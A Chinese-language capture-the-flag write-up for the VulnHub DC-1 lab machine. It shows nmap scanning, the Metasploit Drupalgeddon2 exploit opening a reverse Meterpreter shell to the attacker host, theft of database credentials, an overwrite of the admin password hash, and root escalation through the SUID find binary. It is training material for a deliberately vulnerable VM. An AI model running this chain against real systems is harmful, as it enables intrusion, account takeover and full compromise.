启动
- 靶机下载地址:https://www.vulnhub.com/entry/dc-1,292/#download
- 启动过程:下载完成后,打开VMware虚拟机软件,文件》打开,导入下载的ova文件,将网络适配器改为:NAT模式
- 启动成功界面
扫描
- 渗透网段为192.168.29..0/24, 攻机ip为:10.196.93.128
- 使用namp 进行扫描
# sP 为Ping扫描 nmap -sP 192.168.29.0/24
- 发现靶机ip为:192.168.29.131
- 对靶机进行漏洞扫描
# -p 端口 -a 同时启用操作系统检测和版本检测。 -v 提高输出信息的详细程度 T4 扫描速度 nmap -p 1-65535 -A -v -T4 192.168.29.131 # 扫描结果: tarting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-02 16:17 CST NSE: Loaded 156 scripts for scanning. NSE: Script Pre-scanning. Initiating NSE at 16:17 Completed NSE at 16:17, 0.00s elapsed Initiating NSE at 16:17 Completed NSE at 16:17, 0.00s elapsed Initiating NSE at 16:17 Completed NSE at 16:17, 0.00s elapsed Initiating Ping Scan at 16:17 Scanning 192.168.29.131 [2 ports] Completed Ping Scan at 16:17, 0.00s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 16:17 Completed Parallel DNS resolution of 1 host. at 16:17, 0.01s elapsed Initiating Connect Scan at 16:17 Scanning 192.168.29.131 [65535 ports] Discovered open port 80/tcp on 192.168.29.131 Discovered open port 22/tcp on 192.168.29.131 Discovered open port 111/tcp on 192.168.29.131 Discovered open port 56415/tcp on 192.168.29.131 Completed Connect Scan at 16:17, 4.20s elapsed (65535 total ports) Initiating Service scan at 16:17 Scanning 4 services on 192.168.29.131 Completed Service scan at 16:18, 11.36s elapsed (4 services on 1 host) NSE: Script scanning 192.168.29.131. Initiating NSE at 16:18 Completed NSE at 16:18, 4.12s elapsed Initiating NSE at 16:18 Completed NSE at 16:18, 0.26s elapsed Initiating NSE at 16:18 Completed NSE at 16:18, 0.01s elapsed Nmap scan report for 192.168.29.131 Host is up (0.00074s latency). Not shown: 65531 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0) | ssh-hostkey: | 1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA) | 2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA) |_ 256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA) 80/tcp open http Apache httpd 2.2.22 ((Debian)) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-generator: Drupal 7 (http://drupal.org) |_http-favicon: Unknown favicon MD5: B6341DFC213100C61DB4FB8775878CEC |_http-title: Welcome to Drupal Site | Drupal Site | http-robots.txt: 36 disallowed entries (15 shown) | /includes/ /misc/ /modules/ /profiles/ /scripts/ | /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt | /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt |_/LICENSE.txt /MAINTAINERS.txt |_http-server-header: Apache/2.2.22 (Debian) 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100000 3,4 111/tcp6 rpcbind | 100000 3,4 111/udp6 rpcbind | 100024 1 44051/udp status | 100024 1 47967/tcp6 status | 100024 1 48142/udp6 status |_ 100024 1 56415/tcp status 56415/tcp open status 1 (RPC #100024) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel NSE: Script Post-scanning. Initiating NSE at 16:18 Completed NSE at 16:18, 0.00s elapsed Initiating NSE at 16:18 Completed NSE at 16:18, 0.00s elapsed Initiating NSE at 16:18 Completed NSE at 16:18, 0.00s elapsed Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 20.47 seconds
- 分析结果
- 开放端口:80 、22 、111、56415
- 80端口搭了一个Drupal web服务
攻击
- 使用SMF工具寻找Drupal服务漏洞
msfconsole # 进入工具 search drupal # 搜索 # 搜索结果 ==================================================================================================== Matching Modules # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/unix/webapp/drupal_coder_exec 2016-07-13 excellent Yes Drupal CODER Module Remote Command Execution 1 exploit/unix/webapp/drupal_drupalgeddon2 2018-03-28 excellent Yes Drupal Drupalgeddon 2 Forms API Property Injection 2 exploit/multi/http/drupal_drupageddon 2014-10-15 excellent No Drupal HTTP Parameter Key/Value SQL Injection 3 auxiliary/gather/drupal_openid_xxe 2012-10-17 normal Yes Drupal OpenID External Entity Injection 4 exploit/unix/webapp/drupal_restws_exec 2016-07-13 excellent Yes Drupal RESTWS Module Remote PHP Code Execution 5 exploit/unix/webapp/drupal_restws_unserialize 2019-02-20 normal Yes Drupal RESTful Web Services unserialize() RCE 6 auxiliary/scanner/http/drupal_views_user_enum 2010-07-02 normal Yes Drupal Views Module Users Enumeration 7 exploit/unix/webapp/php_xmlrpc_eval 2005-06-29 excellent Yes PHP XML-RPC Arbitrary Code Execution ==================================================================================================== use 1 # 使用2018 进行攻击 set Rhost 192.168.29.131 # s设置靶机ip set lhost 192.168.29.128 # 设置攻机ip run # 开始攻击 # 攻击成功显示结果 ==================================================================================================== [*] Started reverse TCP handler on 192.168.29.128:4444 [*] Running automatic check ("set AutoCheck false" to disable) [!] The service is running, but could not be validated. [*] Sending stage (39927 bytes) to 192.168.29.131 [*] Meterpreter session 1 opened (192.168.29.128:4444 -> 192.168.29.131:38928) at 2024-06-02 16:35:12 +0800 ====================================================================================================
- 进入靶机
help # 查看可操作项 shell # 进入靶机shell # 使用python 反弹shell python -c "import pty;pty.spawn('/bin/bash');" whoami # 当前用户为 www-data cd /home # 进入home后发现存在 flag4文件夹中的flag4.txt文件 cat /home/flag4/flag4.txt # 提示没有权限 # Can you use this same method to find or access the flag in root? # Probably. But perhaps it's not that easy. Or maybe it is? # 分析:靶机上只有一个web服务,去到它的根目录上看看有没有什么东西 # 由于Drupal 框架搭建在Apache上,得知 /var/www是网站默认的根目录 cd /var/www ls -l ==================================================================================================== www-data@DC-1:/var/www$ ls -l ls -l total 168 -rw-r--r-- 1 www-data www-data 1481 Nov 21 2013 COPYRIGHT.txt -rw-r--r-- 1 www-data www-data 1451 Nov 21 2013 INSTALL.mysql.txt -rw-r--r-- 1 www-data www-data 1874 Nov 21 2013 INSTALL.pgsql.txt -rw-r--r-- 1 www-data www-data 1298 Nov 21 2013 INSTALL.sqlite.txt -rw-r--r-- 1 www-data www-data 17861 Nov 21 2013 INSTALL.txt -rwxr-xr-x 1 www-data www-data 18092 Nov 1 2013 LICENSE.txt -rw-r--r-- 1 www-data www-data 8191 Nov 21 2013 MAINTAINERS.txt -rw-r--r-- 1 www-data www-data 5376 Nov 21 2013 README.txt -rw-r--r-- 1 www-data www-data 9642 Nov 21 2013 UPGRADE.txt -rw-r--r-- 1 www-data www-data 6604 Nov 21 2013 authorize.php -rw-r--r-- 1 www-data www-data 720 Nov 21 2013 cron.php -rw-r--r-- 1 www-data www-data 52 Feb 19 2019 flag1.txt drwxr-xr-x 4 www-data www-data 4096 Nov 21 2013 includes -rw-r--r-- 1 www-data www-data 529 Nov 21 2013 index.php -rw-r--r-- 1 www-data www-data 703 Nov 21 2013 install.php drwxr-xr-x 4 www-data www-data 4096 Nov 21 2013 misc drwxr-xr-x 42 www-data www-data 4096 Nov 21 2013 modules drwxr-xr-x 5 www-data www-data 4096 Nov 21 2013 profiles -rw-r--r-- 1 www-data www-data 1561 Nov 21 2013 robots.txt drwxr-xr-x 2 www-data www-data 4096 Nov 21 2013 scripts drwxr-xr-x 4 www-data www-data 4096 Nov 21 2013 sites drwxr-xr-x 7 www-data www-data 4096 Nov 21 2013 themes -rw-r--r-- 1 www-data www-data 19941 Nov 21 2013 update.php -rw-r--r-- 1 www-data www-data 2178 Nov 21 2013 web.config -rw-r--r-- 1 www-data www-data 417 Nov 21 2013 xmlrpc.php www-data@DC-1:/var/www$ ==================================================================================================== # 发现 flag1.txt cat flag1.txt # Every good CMS needs a config file - and so do you. (大概意思为看看配置文件) #配置文件路径:cd /var/sites/default cd /sites/default cat settings.php # 查看后,发现flag2 ,发现数据库 提示暴力破解或提升权限。 ==================================================================================================== /** * * flag2 * Brute force and dictionary attacks aren't the * only ways to gain access (and you WILL need access). * What can you do with these credentials? * */ $databases = array ( 'default' => array ( 'default' => array ( 'database' => 'drupaldb', 'username' => 'dbuser', 'password' => 'R0ck3t', 'host' => 'localhost', 'port' => '', 'driver' => 'mysql', 'prefix' => '', ), ), );
- 进入数据库
mysql -u dbuser -p drupaldb show databases; # 显示mysql中所有的数据库 # ==================================================================================================== # +--------------------+ # | Database | # +--------------------+ # | information_schema | # | drupaldb | # +--------------------+ # 2 rows in set (0.00 sec) # ==================================================================================================== use drupaldb show tables; # 显示 drupaldb数据库中所有的表 # ==================================================================================================== # +-----------------------------+ # | Tables_in_drupaldb | # +-----------------------------+ # | actions | # | authmap | # | batch | # | block | # | block_custom | # | block_node_type | # | block_role | # | blocked_ips | # | cache | # | cache_block | # | cache_bootstrap | # | cache_field | # | cache_filter | # | cache_form | # | cache_image | # | cache_menu | # | cache_page | # | cache_path | # | cache_update | # | cache_views | # | cache_views_data | # | comment | # | ctools_css_cache | # | ctools_object_cache | # | date_format_locale | # | date_format_type | # | date_formats | # | field_config | # | field_config_instance | # | field_data_body | # | field_data_comment_body | # | field_data_field_image | # | field_data_field_tags | # | field_revision_body | # | field_revision_comment_body | # | field_revision_field_image | # | field_revision_field_tags | # | file_managed | # | file_usage | # | filter | # | filter_format | # | flood | # | history | # | image_effects | # | image_styles | # | menu_custom | # | menu_links | # | menu_router | # | node | # | node_access | # | node_comment_statistics | # | node_revision | # | node_type | # | queue | # | rdf_mapping | # | registry | # | registry_file | # | role | # | role_permission | # | search_dataset | # | search_index | # | search_node_links | # | search_total | # | semaphore | # | sequences | # | sessions | # | shortcut_set | # | shortcut_set_users | # | system | # | taxonomy_index | # | taxonomy_term_data | # | taxonomy_term_hierarchy | # | taxonomy_vocabulary | # | url_alias | # | users | # | users_roles | # | variable | # | views_display | # | views_view | # | watchdog | # +-----------------------------+ # 80 rows in set (0.00 sec) # ==================================================================================================== select name ,pass from users; # ==================================================================================================== # +-------+---------------------------------------------------------+ # | name | pass | # +-------+---------------------------------------------------------+ # | | | # | admin | $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR | # | Fred | $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg | # +-------+---------------------------------------------------------+ # 3 rows in set (0.00 sec) # ==================================================================================================== # 参考链接:https://blog.csdn.net/weixin_33345090/article/details/113563493 根据查询得知,drupal5和6版本是通过MD5进行密码加密的,而drupal7则采用新型Hash方式的进行密码加密,显然靶机数据库的密码不是MD5加密方式加密。 而在Drupal 7的安装目录中的scripts目录下,有一些Drupal7开发者准备好的PHP脚本 password-hash.sh 就是进行密码加密的脚本。 注意:在使用脚本时,不要直接进入到scripts目录中,会报错。 php ./scripts/password-hash.sh '123456'>a.txt cat a.txt password: 123456 hash: $S$DOUZtHmiwRkJCsB1s3uvwHURm6GhWXWHMc2hcLXe1h.TzuvNIy2r # 将新生成的密码替换admin密码 update users set pass = "$S$DOUZtHmiwRkJCsB1s3uvwHURm6GhWXWHMc2hcLXe1h.TzuvNIy2r" where name = 'admin';
- flag3
点击flag3后,显示页面:
关键词:perms、find、passwd、-exec cat /etc/passwd # 查看用户信息 # root:x:0:0:root:/root:/bin/bash # daemon:x:1:1:daemon:/usr/sbin:/bin/sh # bin:x:2:2:bin:/bin:/bin/sh # sys:x:3:3:sys:/dev:/bin/sh # sync:x:4:65534:sync:/bin:/bin/sync # games:x:5:60:games:/usr/games:/bin/sh # man:x:6:12:man:/var/cache/man:/bin/sh # lp:x:7:7:lp:/var/spool/lpd:/bin/sh # mail:x:8:8:mail:/var/mail:/bin/sh # news:x:9:9:news:/var/spool/news:/bin/sh # uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh # proxy:x:13:13:proxy:/bin:/bin/sh # www-data:x:33:33:www-data:/var/www:/bin/sh # backup:x:34:34:backup:/var/backups:/bin/sh # list:x:38:38:Mailing List Manager:/var/list:/bin/sh # irc:x:39:39:ircd:/var/run/ircd:/bin/sh # gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh # nobody:x:65534:65534:nobody:/nonexistent:/bin/sh # libuuid:x:100:101::/var/lib/libuuid:/bin/sh # Debian-exim:x:101:104::/var/spool/exim4:/bin/false # statd:x:102:65534::/var/lib/nfs:/bin/false # messagebus:x:103:107::/var/run/dbus:/bin/false # sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin # mysql:x:105:109:MySQL Server,,,:/nonexistent:/bin/false # flag4:x:1001:1001:Flag4,,,:/home/flag4:/bin/bash 发现flag4 和最开始发现的位置一致,在home目录中,而打开flag4.txt文件,需要提升到root权限。
- 提权
参考链接:https://blog.csdn.net/weixin_44912169/article/details/105845909 参考链接:https://blog.csdn.net/aobian2884/article/details/101404466?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522171733441116800186510085%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=171733441116800186510085&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-1-101404466-null-null.nonecase&utm_term=21&spm=1018.2226.3001.4450 参考链接:https://zhuanlan.zhihu.com/p/571759462?utm_id=0 #-exec 参数后面跟的是command命令,它的终止是以;为结束标志的,所以这句命令后面的分号是不可缺少的,考虑到各个系统中分号会有不同的意义,所以前面加反斜杠 # 寻找具有SUID权限的可执行文件 find / -perm -4000 # www-data@DC-1:/$ find / -perm -4000 # find / -perm -4000 # /bin/mount # /bin/ping # /bin/su # /bin/ping6 # /bin/umount # /usr/bin/at # /usr/bin/chsh # /usr/bin/passwd # /usr/bin/newgrp # /usr/bin/chfn # /usr/bin/gpasswd # /usr/bin/procmail # /usr/bin/find # /usr/sbin/exim4 # /usr/lib/pt_chown # /usr/lib/openssh/ssh-keysign # /usr/lib/eject/dmcrypt-get-device # /usr/lib/dbus-1.0/dbus-daemon-launch-helper # /sbin/mount.nfs # find: `/proc/3396/task/3396/ns/net': No such file or directory # find: `/proc/3396/task/3396/ns/uts': No such file or directory # find: `/proc/3396/task/3396/ns/ipc': No such file or directory # find: `/proc/3396/ns/net': No such file or directory # find: `/proc/3396/ns/uts': No such file or directory # find: `/proc/3396/ns/ipc': No such file or directory # find: `/proc/3424/task/3424/ns/net': No such file or directory # find: `/proc/3424/task/3424/ns/uts': No such file or directory # find: `/proc/3424/task/3424/ns/ipc': No such file or directory # find: `/proc/3424/ns/net': No such file or directory # find: `/proc/3424/ns/uts': No such file or directory # find: `/proc/3424/ns/ipc': No such file or directory # find: `/proc/3641/task/3641/ns/net': No such file or directory # find: `/proc/3641/task/3641/ns/uts': No such file or directory # find: `/proc/3641/task/3641/ns/ipc': No such file or directory # find: `/proc/3641/ns/net': No such file or directory # find: `/proc/3641/ns/uts': No such file or directory # find: `/proc/3641/ns/ipc': No such file or directory # find: `/proc/4233/task/4233/fd/6': No such file or directory # find: `/proc/4233/task/4233/fdinfo/6': No such file or directory # find: `/proc/4233/fd/6': No such file or directory # find: `/proc/4233/fdinfo/6': No such file or directory 可以发现find就具有权限,使用-exec参数提权 # /bin/sh ==等价于== /bin/bash --posix #开启便携模式,遇到错误时,停止继续运行 ww-data@DC-1:/home/flag4$ find flag4.txt -exec '/bin/sh' \; find flag4.txt -exec '/bin/sh' \; # whoami whoami root #
- flag5
# 寻找flag文件 find / -name '*flag.txt' # 结果: # /root/thefinalflag.txt cat /root/thefinalflag.txt # 结果: # Well done!!!! # Hopefully you've enjoyed this and learned some new skills. # You can let me know what you thought of this little journey # by contacting me via Twitter - @DCAU7 # #
结束。
